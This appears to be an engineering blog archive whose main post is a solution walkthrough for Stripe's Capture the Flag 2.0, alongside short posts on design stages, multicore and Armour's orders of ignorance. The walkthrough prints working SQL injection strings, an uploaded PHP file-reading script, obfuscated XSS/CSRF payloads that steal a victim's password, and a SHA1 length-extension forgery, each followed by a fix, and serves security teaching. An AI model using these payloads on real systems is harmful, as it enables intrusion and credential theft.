Sailing the Seven C’s of design*

January 18th, 2013

I’m always looking for nice little mnemonics to help remember the important concepts in design.  Here’s one for model-driven development I call the “Seven C’s”.  It enumerates the seven stages a design goes through, from initial idea to code.

CONCEPT
The Concept phase is about understanding the problem.  In other words: requirements analysis.  When you’re in Concept mode your main focus is on validation – am I solving the right problem for my customer?

CREATION
In Creation mode you are synthesising a solution.  At this stage we are building an Ideal model, ignoring many of the complications of the real world.  Our design should be completely concurrent (every object has its own thread of control), completely asynchronous (messaging) and completely flat (no hierarchy).
Your focus should be on:

  • Design verification – if I can’t demonstrate an ideal design works then there’s no way a less-than-ideal design will work!
  • Design evaluation – as with all design: is this the best compromise?

COMPOSITION
Also known as ‘design levelling’ (but that doesn’t start with C!).  Your Ideal model probably has some high-level elements (components, etc) that need further refinement; and plenty of low-level elements (objects) that can be collected together to perform ‘emergent’ behaviours.  Design levelling is the act of (re)organising the design into appropriate levels of abstraction – sub-systems, components, objects, etc.

CONCURRENCY
Our Ideal model treats every element as concurrent, but experience tells us that isn’t practical for a real software system. So we reduce the number of concurrent elements in our system to get the most effective solution with the smallest number of threads.

CONSTRUCTION
Like any other construction project our plans must contain enough information so that skilled implementers can build our dream.  In our case the construction plans are our class diagrams, composite structures, state machines and algorithm descriptions.
Once in the construction stage our focus is on verification – does this design still fulfil its requirements?

CORRUPTION
Our construction models may be complete and may be translatable directly to code.  However, the result of that translation may not be ideal; and may not benefit from many of the features of our chosen implementation language.  Corruption is the act of modifying our design to make the most effective use of our implementation language and platform.

CODE
The end result.

How does this all map onto typical model-driven-design nomenclature?  Well, pretty much like this:

Computationally-Independent Model (CIM)
•    Concept

Platform-Independent Model (PIM)
•    Creation
•    Composition
•    Concurrency
•    Construction

Platform-Specific Model (PSM)
•    Corruption
•    Code

*  Apologies to all the grammar fanatics out there for my use of the “grocer’s apostrophe”

Capturing the Stripe-d Flag 2.0 – The After Party

August 30th, 2012

Following on from our previous article looking at Stripe’s Capture the Flag 2.0 challenge, Team Feabhas cracked the last of the levels and its members should hopefully be receiving their complimentary t-shirts soon.

It has proven to be a popular article with lots of people coming to the blog for solutions and walk-throughs, and now that the competition has finished we have decided to share the way we approached each of these levels, their solutions and the way in which each attack vector can be mitigated.

Level 0

The Brief

We are told that the key to level 1 is stored in the database and we have to ‘crack’ it. Looking at the code we can see that it holds data in a key|value pair but we don’t know the key so we can’t get the value.

app.post('/*', function(req, res) {
        var namespace = req.body['namespace'];
        var secret_name = req.body['secret_name'];
        var secret_value = req.body['secret_value'];

        var query = 'INSERT INTO secrets (key, secret) VALUES (? || "." || ?, ?)';
        db.run(query, namespace, secret_name, secret_value, function(err) {
                if (err) throw err;
                res.header('Content-Type', 'text/html');
                res.redirect(req.path + '?namespace=' + namespace);
         });
});

The Hack

The code provided lists the following function:

app.get('/*', function(req, res) {
  var namespace = req.param('namespace');

  if (namespace) {
    var query = 'SELECT * FROM secrets WHERE key LIKE ? || ".%"';
    db.all(query, namespace, function(err, secrets) {
             if (err) throw err;

             renderPage(res, {namespace: namespace, secrets: secrets});
           });
  } else {
    renderPage(res, {});
  }
});

When you request this page by performing a GET operation, the SQL query
SELECT * FROM secrets WHERE key LIKE ? || ".%"
is performed. The ? after LIKE in the query is the placeholder for the user-submitted data, which is not checked for wildcard characters at all. The trick to overcoming this is to use the ‘%’ character as the namespace value; ‘%’ is the standard SQL wildcard for pattern matching, which effectively turns our statement into:
SELECT * FROM secrets WHERE key LIKE '%' || ".%"
This has the effect of telling the database to return all key|value pairs in the database – including the key to level 1.

One of the things to note is that the hack needs to be performed either from the text input box on the page, or from a tool such as cURL.

The Fix

Never trust data from the client. This would’ve been fixed by limiting the type of data allowed to be submitted and sanitising it before execution.
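
As a rough illustration of that sanitising step, the sketch below escapes the LIKE wildcards before the value reaches the query. It is written in Python against the standard sqlite3 module rather than the Node.js code of the challenge, and the helper names escape_like and find_secrets are made up for this example.

```python
import sqlite3

ESCAPE_CHAR = "\\"  # a single backslash, used as the LIKE escape character


def escape_like(value):
    """Neutralise the LIKE wildcards (% and _) in user-supplied text."""
    return (
        value.replace(ESCAPE_CHAR, ESCAPE_CHAR * 2)
        .replace("%", ESCAPE_CHAR + "%")
        .replace("_", ESCAPE_CHAR + "_")
    )


def find_secrets(db, namespace):
    """Return the (key, secret) rows whose key starts with 'namespace.'."""
    pattern = escape_like(namespace) + ".%"
    # The pattern is still bound as a parameter; ESCAPE tells SQLite that a
    # backslash in front of % or _ makes it a literal character.
    query = "SELECT key, secret FROM secrets WHERE key LIKE ? ESCAPE '\\'"
    return db.execute(query, (pattern,)).fetchall()
```

With this in place a namespace of ‘%’ only matches keys that literally begin with "%.", so other users’ secrets are no longer returned.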

Level 1

The Brief

We’re told that this machine is secure and we’ll have to try all possibilities but something is off with the code.

The Hack

The code is provided in the form of a PHP file which features the following snippet:

<?php
	$filename = 'secret-combination.txt';
	extract($_GET);
	if (isset($attempt)) {
		$combination = trim(file_get_contents($filename));
		if ($attempt === $combination) {
			echo "<p>How did you know the secret combination was" . " $combination!?</p>";
			$next = file_get_contents('level02-password.txt');
			echo "<p>You've earned the password to the access Level 2:" . " $next</p>";
		} else {
		  	echo "<p>Incorrect! The secret combination is not $attempt</p>";
		}
	}
?>

What happens here is that the password submitted is tested against a value read in from $filename using the function file_get_contents, which reads the given file into a string. If the call is unsuccessful it returns FALSE, which trim() then turns into an empty string.

If we look at the extract() function, we can see it extracts variables into the variable namespace, overriding any existing ones. Note that $filename is declared, then extract() is called and then it is used.

By combining these things, we can override the value $filename to a non-existent file to get a comparison between two empty strings. To use this we simply visit: https://level01-2.stripe-ctf.com/user-USERNAME/?attempt=&filename=
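
The same mechanism can be mimicked outside PHP. The following Python sketch is only an analogy: a dictionary stands in for PHP’s variable namespace, update() plays the role of extract($_GET), and the function names are invented for the illustration.

```python
from urllib.parse import parse_qs


def read_or_empty(path):
    """Mimic trim(file_get_contents(...)): an unreadable file yields ''."""
    try:
        with open(path) as handle:
            return handle.read().strip()
    except OSError:
        return ""


def check_attempt(query_string):
    variables = {"filename": "secret-combination.txt"}
    # Analogue of extract($_GET): every request parameter becomes a
    # variable, silently overwriting anything already defined.
    params = parse_qs(query_string, keep_blank_values=True)
    variables.update({name: values[0] for name, values in params.items()})
    if "attempt" not in variables:
        return None
    combination = read_or_empty(variables["filename"])
    return variables["attempt"] == combination
```

Calling check_attempt("attempt=&filename=") compares two empty strings and so returns True, which is the whole attack in one line.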

The Fix

Again, don’t trust data from users! Using extract into the current symbol table means your variables can be overwritten – especially on $_GET variables that can be submitted by users. For any web API, you should know what parameters are expected and check for those explicitly.

A safer way to code this would have been:

<?php
	$filename = 'secret-combination.txt';
	// Read only the parameter we expect; nothing in $_GET can overwrite $filename
	if (isset($_GET['attempt'])) {
		$attempt = $_GET['attempt'];
		$combination = trim(file_get_contents($filename));
		if ($attempt === $combination) {
			echo "<p>How did you know the secret combination was" . " $combination!?</p>";
			$next = file_get_contents('level02-password.txt');
			echo "<p>You've earned the password to the access Level 2:" . " $next</p>";
		} else {
			echo "<p>Incorrect! The secret combination is not $attempt</p>";
		}
	}
?>

Level 2

The Brief

We’re given access to Stripe’s Social Network “which are all the rage” and told to fill in our profile picture and that there’s a file called password.txt that contains the password for level 3.

The Hack

Again, we’re provided with the source code that shows that we can upload an arbitrary file to the /uploads directory! Oh dear.
The hack here is to upload a simple PHP script, which we’ll call foo.php, that contains the following

<?php
	echo "Password is: " . file_get_contents("../password.txt");
?>

and then visit https://level02-4.stripe-ctf.com/user-USERNAME/uploads/foo.php to see the password for level 3. The ability to upload our own scripts is a useful ability… one that is used later on to good effect!

The Fix

Check what gets uploaded by your users. You can discard any file types that aren’t acceptable as well as forbidding access to scripts in the uploads directory.
There are various examples of scripts that will perform some kind of sanity check on uploaded files. A simple search for php validate image upload will provide plenty of examples to use as a starting point.
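
To give a flavour of such a sanity check, here is a minimal sketch in Python (not the PHP of the challenge). The allow-list and the function name are assumptions made for the example, and a check like this complements, rather than replaces, stopping the web server from executing anything in the uploads directory.

```python
import os

# Hypothetical allow-list: permitted extensions and the leading "magic"
# bytes a genuine file of that type starts with.
ALLOWED_SIGNATURES = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".gif": b"GIF8",
    ".jpg": b"\xff\xd8\xff",
    ".jpeg": b"\xff\xd8\xff",
}


def is_acceptable_upload(filename, data):
    """Accept a file only if its extension is allowed and its content
    starts with the signature expected for that extension."""
    extension = os.path.splitext(filename)[1].lower()
    signature = ALLOWED_SIGNATURES.get(extension)
    return signature is not None and data.startswith(signature)
```

Under these rules foo.php is rejected on its extension alone, and a PHP script renamed to foo.png is rejected because it does not start with the PNG signature.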

Level 3

The Brief

We’re told that the new storage mechanism uses a human login and that user ‘bob’ holds the password for level 4.

The Hack

This is another case of SQL injection. In this case the offending line is the query string

    query = """SELECT id, password_hash, salt FROM users
               WHERE username = '{0}' LIMIT 1""".format(username)
    cursor.execute(query)

    res = cursor.fetchone()
    if not res:
        return "There's no such user {0}!\n".format(username)
    user_id, password_hash, salt = res

    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can see that we can tag on some SQL of our own in this scenario; in this case we want to make use of SQL’s UNION operator.

UNION allows you to combine two or more result sets from multiple tables together. We’re going to use this to turn the statement into the following (note that {0} is replaced with our injection string):

SELECT id, password_hash, salt FROM users WHERE username = 'NULL' UNION SELECT id, HASH_WE_KNOW, SALT_WE_KNOW FROM users WHERE username = 'bob' -- ' LIMIT 1

The string we’re going to insert is everything from NULL' up to and including the --, which is used to comment out the rest of the query (the original closing quote and the LIMIT 1).

So we have the query string but we need to get our hash and salt so we can complete it. The sample above featured the line:


    calculated_hash = hashlib.sha256(password + salt)
    if calculated_hash.hexdigest() != password_hash:
        return "That's not the password for {0}!\n".format(username)

We can simply use our Python interpreter to do the hard work for us, generating the requisite hexdigest from a password of ‘xx’ and a salt of ‘x’ to keep things simple:

[nick@slimtop ~]$ python
Python 2.7.3 (default, Jul 24 2012, 10:05:39) 
[GCC 4.7.0 20120507 (Red Hat 4.7.0-5)] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import hashlib
>>> print hashlib.sha256('xx' + 'x').hexdigest()
cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860

All that’s left is to enter the query string NULL' UNION SELECT id, 'cd2eb0837c9b4c962c22d2ff8b5441b7b45805887f051d39bf133b583baf6860', 'x' FROM users WHERE username = 'bob' -- as the username and set our password to be ‘xx’ and in we go.

The Fix

This is a far more complex fix to implement, as one really has to think like a cracker. However, a good starting point would be the SQL Injection Prevention Cheat Sheet from the Open Web Application Security Project.
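
One measure that kind of guidance commonly recommends is a parameterised query. The sketch below assumes a SQLite database reached through Python 3’s sqlite3 module and a users table shaped like the one in the snippet above; check_login is a name made up for the example, not the challenge’s code.

```python
import hashlib
import hmac
import sqlite3


def check_login(db, username, password):
    """Look the user up with a bound parameter instead of string formatting."""
    query = "SELECT id, password_hash, salt FROM users WHERE username = ? LIMIT 1"
    row = db.execute(query, (username,)).fetchone()
    if row is None:
        return False
    _user_id, password_hash, salt = row
    calculated = hashlib.sha256((password + salt).encode("utf-8")).hexdigest()
    # Constant-time comparison of the two hex digests
    return hmac.compare_digest(calculated, password_hash)
```

Because the username is passed as data, the UNION string from the hack is simply looked up as a (non-existent) user name and never becomes part of the SQL.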

Level 4

The Brief

We’re told about a piece of software called Karma Trader that allows people to reward others with karma for good deeds – the caveat being that

In order to ensure you’re transferring karma only to good people, transferring karma to a user will also reveal your password to him or her.

The Hack

The presence of the jQuery library is a good indicator that we’re going to be doing something untoward using it. The hack here is a very simple XSS exploit to make use of the fact that our password will be shown to people we transfer karma to. We simply set our password to be a piece of jQuery code that will use the jQuery.post() function to send some karma to our user naughty_man.

So we create our account as naughty_man with the password of <script>$.post("transfer", {to: "naughty_man", amount: "50"} )</script> and send some karma to karma_trader.
When she next logs in, she will unknowingly execute our script which will send us some karma and her password for the next level.

The Fix

As before – the primary concept is not to trust any input that comes from the user. The input fields should be escaped for the context in which they are displayed (HTML-encoded, in this case) to ensure that they are safe. Again, the cheat sheets from the Open Web Application Security Project provide a good starting point; alongside the SQL Injection Prevention Cheat Sheet there is one covering XSS prevention.
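
A minimal sketch of that escaping, using Python’s standard html module; the function name and the table-cell markup are invented for the illustration and are not taken from Karma Trader.

```python
import html


def render_password_cell(password):
    """Return table-cell markup with the user-supplied value HTML-escaped."""
    return "<td>" + html.escape(password, quote=True) + "</td>"
```

Rendered this way, the password from the hack is displayed as harmless text beginning with &lt;script&gt; rather than being executed by the victim’s browser.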

Level 5

The Brief

We’re told about a new type of federated identity system where you provide a username, password and pingback URL where a simple “AUTHENTICATED” or “DENIED” is posted to the pingback location.
We’re also informed that we will need to authenticate as a user of level 5 and that it can only make outbound requests to other stripe-ctf.com servers.

Interestingly, we’re told that someone forgot to firewall off the high ports from the Level 2 server.

The Hack

There are two parts to this hack: get authenticated at a lower level and then pingback to gain authentication at level 5.
To accomplish the first part, we need to get a stripe-ctf.com server to provide us with an ‘AUTHENTICATED’ string. Fortunately for us, we still have access to level 2!

Looking at the code, we can see the regex that is used to authenticate:

	def authenticated?(body)
		body =~ /[^\w]AUTHENTICATED[^\w]*$/
	end

We simply upload a script, stripe_auth.php, to print that string out:

<?php
print " AUTHENTICATED \n"; /* Note the spaces either side are matched for! */
?>

We can then specify this location as our pingback URL to gain initial authentication at level 2 – http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php
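
To see why such a short response is enough, the check can be reproduced in Python. This is an approximation: the re.MULTILINE flag is used because Ruby’s $ matches at the end of any line, and the function name is simply a transliteration of the Ruby one.

```python
import re

# Same pattern as the Ruby code; MULTILINE makes $ match at every line end
AUTH_PATTERN = re.compile(r"[^\w]AUTHENTICATED[^\w]*$", re.MULTILINE)


def authenticated(body):
    """True if any line of the body ends with a non-word character,
    the word AUTHENTICATED and optional trailing non-word characters."""
    return AUTH_PATTERN.search(body) is not None
```

The pattern never checks who produced the body, so authenticated(" AUTHENTICATED \n") is true, and so is any longer page that happens to contain a line ending in that word.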

The second part required a bit of lateral thinking – reading our logged in page we can see it says:

You are authenticated as hacker@level02-2.stripe-ctf.com

The word ‘authenticated’ here is enough to say we’re authenticated as level 5! To use it we just tell the level 5 server to use itself by specifying a pingback URL of:
https://level05-1.stripe-ctf.com/user-USERNAME/?pingback=http://level02-2.stripe-ctf.com/user-USERNAME/uploads/stripe_auth.php

This provides us with the password for our next level!

The Fix

Once again – we should not trust any input provided by the user. If we are going to allow some kind of authentication server, then we need to be able to trust the remote server. Taking it on the word of a user is not good enough!

We should either have a hard coded list of servers that we trust, or implement some kind of trust mechanism – such as public key cryptography.

Also, the fatal flaw in the design was to include the keyword for authentication within the level 5 server output.
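
The hard coded list could be as simple as the following Python sketch. The host name auth.example.com is a placeholder and is_trusted_pingback is a made-up helper; a real deployment would also need to authenticate the server’s response.

```python
from urllib.parse import urlparse

# Hypothetical allow-list of authentication servers we have chosen to trust
TRUSTED_HOSTS = {"auth.example.com"}


def is_trusted_pingback(url):
    """Accept a pingback URL only if it is HTTPS and points at a trusted host."""
    parsed = urlparse(url)
    return parsed.scheme == "https" and parsed.hostname in TRUSTED_HOSTS
```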

Level 6

The Brief

We’re told that after the catastrophe of level 4 the Karma Trader was shut down but a new service, Streamer, was created. The security of this app has been beefed up and the password of the first user contains double quotes and apostrophes to complicate things… but that it’s also the password to level 7.

The Hack

Looking through the source code for Streamer for these so-called precautions we come across the following lines of code:

   def self.safe_insert(table, key_values)
      key_values.each do |key, value|
        # Just in case people try to exfiltrate
        # level07-password-holder's password
        if value.kind_of?(String) &&
            (value.include?('"') || value.include?("'"))
          raise "Value has unsafe characters"
        end
      end

This forbids any insertion of values containing either an apostrophe ‘ or double quote ” – Very important!

To explore the site a bit more, we create an account and have a look at how the posts are stored and manipulated. In the HTML we see the following:

<script>
      var username = "naughty_man";
      var post_data = [{"time":"Fri Aug 24 19:54:42 +0000 2012","title":"Hello World","user":"level07-password-holder","id":null,"body":"Welcome to Streamer, the most streamlined way of sharing\nupdates with your friends!\n\nOne great feature of Streamer is that no password resets are needed. I, for\nexample, have a very complicated password (including apostrophes, quotes, you\nname it!). But I remember it by clicking my name on the right-hand side and\nseeing what my password is.\n\nNote also that Streamer can run entirely within your corporate firewall. My\nmachine, for example, can only talk directly to the Streamer server itself!"}];
      function escapeHTML(val) {
        return $('<div/>').text(val).html();
      }

      function addPost(item) {
        var new_element = '<tr><th>' + escapeHTML(item['user']) +
            '</th><td><h4>' + escapeHTML(item['title']) + '</h4>' +
            escapeHTML(item['body']) + '</td></tr>';
        $('#posts > tbody:last').prepend(new_element);
      }

      for(var i = 0; i < post_data.length; i++) {
        var item = post_data[i];
        addPost(item);
      };
</script>

So interestingly, we can see that the posts are stored in a way that can be maliciously escaped with an errant </script> tag – we can test it by posting </script><script>alert(0);</script> and checking that the alert window is visible after refreshing the browser window – success.

What we want to do is read in the contents of ‘user_info’, which we can see holds the current user’s password, and make sure that we don’t use any single or double quote characters as submitting these is not allowed – quite the challenge.

Fortunately for us, we can use jQuery.get() to retrieve a page for us and we can also force the browser to then submit this page (or the last 180 characters of it) in the form provided without any user intervention – This type of attack is called a Cross Site Request Forgery.

What we will do is:

// Get the page 'user_info' into a string with the jQuery function
$.get('user_info', function(data){
	// Remove all of the string apart from the last 180 characters to keep it short
	data = data.substr(data.length - 180);
	// Replace a double quote (the first one found) with the text <DOUBLE>
	data = data.replace('\"','<DOUBLE>');
	// Replace a single quote (the first one found) with the text <SINGLE>
	data = data.replace('\'','<SINGLE>'); 
	// We know there's only one form so set its value to be our data
	document.forms[0].content.value = data;
	// We know there's only one form so 'click' submit on the first form of the document
	document.forms[0].submit(); 
});

One problem we have is that we typically need to use quotes to delimit strings in our JavaScript, and these are forbidden, but fortunately we can use a combination of JavaScript’s eval() operation and String.fromCharCode to accomplish what we need.

String.fromCharCode() will allow us to encode forbidden characters that will be replaced at runtime by the eval() function – such that alert('Hi') becomes alert(eval(String.fromCharCode(39, 72, 105, 39))).
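
Working out the character codes by hand is tedious, so a small helper can generate them. The Python sketch below is one way to do it; both function names are invented for the example.

```python
def to_char_codes(text):
    """Return a String.fromCharCode(...) call listing each character code."""
    codes = ", ".join(str(ord(ch)) for ch in text)
    return "String.fromCharCode(" + codes + ")"


def quote_free_literal(text):
    """Build a JavaScript expression, free of quote characters, that
    evaluates to the single-quoted string literal containing `text`."""
    return "eval(" + to_char_codes("'" + text + "'") + ")"
```

For example, quote_free_literal("Hi") produces eval(String.fromCharCode(39, 72, 105, 39)). The text is wrapped in quotes as-is, so anything that needs escaping inside a JavaScript string must already be escaped by the caller.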

So knowing this, we can create our script and then convert it to using eval/String.fromCharCode so that our naughty script goes from…

}];// </script><script>$.get('user_info', function(data){ data = data.substr(data.length - 180); data = data.replace('\"','<DOUBLE>'); data = data.replace('\'','<SINGLE>'); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

to this.

}];// </script><script>$.get(eval(String.fromCharCode(39, 117, 115, 101, 114, 95, 105, 110, 102, 111, 39)), function(data){ data = data.substr(data.length - 180); data = data.replace(eval(String.fromCharCode(39, 92, 34, 39)),eval(String.fromCharCode(39, 60, 68, 79, 85, 66, 76, 69, 62, 39))); data = data.replace(eval(String.fromCharCode(39, 92, 39, 39)),eval(String.fromCharCode(39, 60, 83, 73, 78, 71, 76, 69, 62, 39))); document.forms[0].content.value = data; document.forms[0].submit(); });</script> 

Finally, we can insert this into the stream (preferably with JavaScript disabled unless you want to run it yourself!) and wait for the first user to log in and unwittingly execute our script and post their valuable credentials.

The Fix

By now, we should be totally paranoid about any input data! Be sure to strip, filter or reject user data that contains HTML characters, or encode those characters with safe alternatives so that ‘<’ becomes &lt;. A read of the Secure-Programs-HOWTO is a good way to become aware of the ways that users can trick you into running bad code.
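
For data that is written into a script block, as post_data is here, one common encoding is to emit the characters that matter to the HTML parser as JSON \u escapes. A minimal Python sketch, with a made-up function name:

```python
import json


def json_for_script(value):
    """Serialise a value as JSON that is safe to place inside a <script> block.

    <, > and & can only occur inside JSON strings, so replacing them with
    \\uXXXX escapes does not change the decoded data.
    """
    return (
        json.dumps(value)
        .replace("<", "\\u003c")
        .replace(">", "\\u003e")
        .replace("&", "\\u0026")
    )
```

A post body of </script><script>alert(0);</script> then reaches the page without a literal ‘<’ in it, so it can no longer close the surrounding script tag, yet JavaScript still decodes it to the original text.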

Level 7

The Brief

For level 7, we are introduced to an on-line waffle ordering system. There are two levels of waffles that can be ordered, standard waffles and ‘premium’ waffles. We only have access to the standard waffles, but we need to be able to place an order for a premium waffle to reveal the password for the next level.
We are provided with an API to the ordering system along with our secret key and a page (/logs/<user_id>) where we can view any previous orders we may have placed.

The Hack

The API for the system attempts to be secure by using a message signing system. There are two parts to the order: the parameters (count, user_id, latitude, longitude and waffle) and a signature, which is produced by signing the parameters with the SHA1 algorithm using our secret key. This would give a string such as:

count=1&lat=0&user_id=5&long=0&waffle=liege|sig:a2f7af47b2633dd00f94d204e03d2a3f9a012674

This means we can exploit a SHA padding attack (also known as a length extension attack). This enables us to create a valid SHA1 signature without knowing the original secret.

The design of the system allows us to find the order log of any user by changing the user ID on the logs page. From this we can get an original order from a privileged user:

count=10&lat=37.351&user_id=1&long=-119.827&waffle=eggo|sig:5fe387f05d3b205b6d10108c8f31312c8fd56711

There are tools that can generate SHA padding. We want to add the parameter waffle=liege to the parameters, and using the tools we get a new string of:

count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x028&waffle=liege|sig:c0b55677bf18c7b48a32f1f705667e11008b93b2
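
The run of \x80 and \x00 bytes is the padding SHA1 itself would have appended to the original message. The Python sketch below reproduces it for the string above; the 14-byte key length is an assumption, inferred from the final \x02 and 8 (0x38) bytes, which encode a length of 568 bits or 71 bytes. Computing the new signature additionally needs a SHA1 implementation that can resume from the old signature, which Python’s hashlib does not offer, so that step is left out.

```python
import struct


def sha1_padding(total_length):
    """Padding SHA-1 appends to a message of total_length bytes: a 0x80
    byte, zero bytes up to 56 mod 64, then the bit length as a 64-bit
    big-endian integer."""
    zero_count = (55 - total_length) % 64
    bit_length = total_length * 8
    return b"\x80" + b"\x00" * zero_count + struct.pack(">Q", bit_length)


KEY_LENGTH = 14  # assumption: inferred from the length bytes in the example
ORIGINAL = b"count=2&lat=37.351&user_id=1&long=-119.827&waffle=chicken"

padding = sha1_padding(KEY_LENGTH + len(ORIGINAL))
forged_params = ORIGINAL + padding + b"&waffle=liege"
```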

The Fix

The first reason why we are able to use this hack is because it is very simple to find the logs of other users – these should be protected – and the second reason is because the input has not been sanitised correctly.
The code used is:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        params[key] = val
    return params

This allows the same key to be submitted twice, and the second time it will overwrite the value of the first.

By changing the code to something like the following:

def parse_params(raw_params):
    pairs = raw_params.split('&')
    params = {}
    for pair in pairs:
        key, val = pair.split('=')
        key = urllib.unquote_plus(key)
        val = urllib.unquote_plus(val)
        # Keep only the first value seen for each key
        if key not in params:
            params[key] = val
    return params

the second instance of ‘waffle’ would have been ignored.
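
The difference between the two versions is easy to demonstrate. The sketch below is a Python 3 port (urllib.parse.unquote_plus replaces the Python 2 call) with an extra first_wins flag, added purely for the comparison, that switches between the two behaviours.

```python
from urllib.parse import unquote_plus


def parse_params(raw_params, first_wins):
    """Parse key=value pairs; first_wins selects which duplicate is kept."""
    params = {}
    for pair in raw_params.split("&"):
        key, val = pair.split("=", 1)
        key = unquote_plus(key)
        val = unquote_plus(val)
        if first_wins and key in params:
            continue  # ignore any repeat of a key we have already seen
        params[key] = val
    return params


raw = "count=1&waffle=eggo&waffle=liege"
original_behaviour = parse_params(raw, first_wins=False)  # waffle -> liege
fixed_behaviour = parse_params(raw, first_wins=True)      # waffle -> eggo
```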

Level 8

The Brief

For level 8 we had to crack a new password storing mechanism. To supposedly increase security, a password is split between four separate servers – so that even if one server was compromised, the password would still be secure. To check a password, a 12-digit password was submitted to the main server and it would simply return ‘success’ or ‘failure’.

The system also provided a webhook that would be called by the main server to return the result of the password attempt.

To make life more interesting, the password server had been firewalled, so that it could only be reached from another stripe-ctf.com server. In addition to this, the system had delays inserted to prevent timing attacks, such that the main server always returned the success or failure of a password in a consistent time.

The Hack

We knew from previous levels that we could launch our attack from the compromised level 2 server – so that was one part of the challenge solved.

Looking at the design of the algorithm, it was fairly obvious that the fundamental flaw was that by splitting the key into 4 chunks of 3 digits, it greatly reduced the possible combinations from 10^12 to 10^3 per chunk, which is feasible to attack by brute force.

The first attempt at cracking this involved finding the four servers by sweeping through the port numbers for a valid response and then attacking each of the chunk servers in turn. While this worked locally – it failed on the Stripe servers as the chunk servers were firewalled and could not be reached from the level 2 server…

By going back to the logs, we finally noticed the second flaw in the system. The main server split the 12 digits into chunks and submitted the chunks to the chunk servers in turn. However, if any of the chunk servers returned a failure, then for efficiency, the main server stopped checking and returned the result to the server specified in the webhook. This actually turned out to be the key flaw in the system, as the webhook could look at the successive client port numbers from the main server and work out how far along the system it had got (client port numbers are assigned sequentially – so each call to a chunk server would use a port number – therefore the fewer port numbers used between calls indicated that the password failed early).

Therefore it became possible to brute force the first chunk by looking for a port difference of 2, the second chunk for a port difference of 3 and for chunk 3 a port difference of 4.
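
The idea can be tried out against a toy model. The Python sketch below simulates a main server whose outbound connections take consecutive port numbers and then recovers the password from the port differences alone. It is an idealised illustration rather than our attack script: the class, the starting port and the absence of any other traffic (which on the real servers added noise and forced retries) are all assumptions.

```python
class SimulatedMainServer:
    """Toy main server: each outbound connection uses the next port number."""

    def __init__(self, password):
        self.chunks = [password[i:i + 3] for i in range(0, 12, 3)]
        self.port = 40000  # arbitrary starting port

    def check(self, guess):
        """Return (success, source port of the call made to the webhook)."""
        success = True
        for i, expected in enumerate(self.chunks):
            self.port += 1  # one connection to the next chunk server
            if guess[3 * i:3 * i + 3] != expected:
                success = False
                break  # the early exit that leaks information
        self.port += 1  # the connection that reports back to the webhook
        return success, self.port


def crack(server):
    """Recover the 12-digit password using only port differences."""
    known = ""
    _, last_port = server.check("0" * 12)
    for index in range(3):
        fail_delta = index + 2  # ports consumed when chunk `index` is wrong
        for candidate in range(1000):
            guess = (known + "%03d" % candidate).ljust(12, "0")
            success, port = server.check(guess)
            delta, last_port = port - last_port, port
            if success or delta > fail_delta:
                known += "%03d" % candidate
                break
    # The last chunk is confirmed by the ordinary success response
    for candidate in range(1000):
        guess = known + "%03d" % candidate
        if server.check(guess)[0]:
            return guess
    return None
```

In this model at most about 4,000 guesses are needed instead of up to 10^12: a wrong first chunk always costs 2 ports, so a larger difference shows the first chunk is right, and likewise with differences of 3 and 4 for the second and third chunks.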

The Fix

Aside from the flaw in the system that reduced the possible combinations to a point where it became feasible to brute force the attack – the main flaw that allowed the attack to succeed was the shortcut of not submitting all the chunks to all the servers each time.
While this may have seemed like a good idea for computational efficiency, it proved to be the weak link that could then be exploited.
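
A version without the shortcut might look like the following Python sketch, in which every chunk server is consulted on every attempt. The function and its chunk_checkers argument (one callable per chunk server) are hypothetical.

```python
def check_password(chunks, chunk_checkers):
    """Ask every chunk server about its chunk, even after a failure, so the
    number of outbound connections does not depend on the guess."""
    results = [checker(chunk) for chunk, checker in zip(chunks, chunk_checkers)]
    return all(results)
```

The list is built in full before all() looks at it, so a wrong first chunk costs exactly as many connections as a wrong last chunk.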

Conclusion

Hopefully this has been a useful and insightful article on the many ways that web applications can be attacked – just today Google published an article about how difficult content hosting on the modern web has become and if those sorts of players are struggling with it then it’s a very serious issue indeed.

You should sign up for our mailing list to hear about our latest blog articles and exciting new course offerings and if you have insight or alternative solutions we’d love to hear about them in the comments.

Can existing embedded applications benefit from Multicore Technology?

June 15th, 2012

It feels as though not a day goes by without a new announcement regarding a major development in multicore technology. With so much press surrounding multicore, you have to ask the question “Is it for me?” i.e. can I utilise multicore technology in my embedded application?

However, from a software developer’s perspective, all the code examples seem to demonstrate the (same) massive performance improvements to “rendering fractals” or “ray tracing programs”. The examples always refer to Amdahl’s Law, showing gains when using, say, 16 or 128 cores. This is all very interesting, but not what I would imagine most embedded developers would consider “embedded”.  These types of programs are sometimes referred to as “embarrassingly parallel” as it is so obvious they would benefit from parallel processing. The examples also tend to use proprietary solutions, such as TBB from Intel, or language extensions with limited platform support, e.g. OpenMP. In addition, this area of parallelisation is being addressed more and more by using multicore General Purpose Graphics Processing Units (GPGPU), such as PowerVR from Imagination Technologies and Mali from ARM, using OpenCL; however this is getting off-topic.

So taking “fractals”, OpenMP and GPGPUs out of the equation, is multicore really useful for embedded systems?

The Five Orders of Ignorance

December 30th, 2011

It’s not often you read a paper that has something unique and fresh to say about a topic, and expresses it in a clear and concise way.

Somehow, Phillip Armour’s The Five Orders of Ignorance had eluded me, until I found it referenced in another paper.

It really is an interesting point of view on software development.  You can read the paper here.

Armour’s central tenet is that software is a mechanism for capturing knowledge. That is, (correct) software is the result of having understood and formalised our knowledge about the problem we are solving.

Clearly, at each stage of the development process we have different levels of knowledge (or ignorance; the conjugate of knowledge) about our problem.  As we move towards delivery our knowledge increases; and our ignorance decreases – hopefully!

A stratified, or layered, model of ignorance gives a good measure of our progress through the development – in some ways a far superior model to the traditional time/artefact/activity–based approach.

Armour’s levels – or orders – of ignorance are as follows:

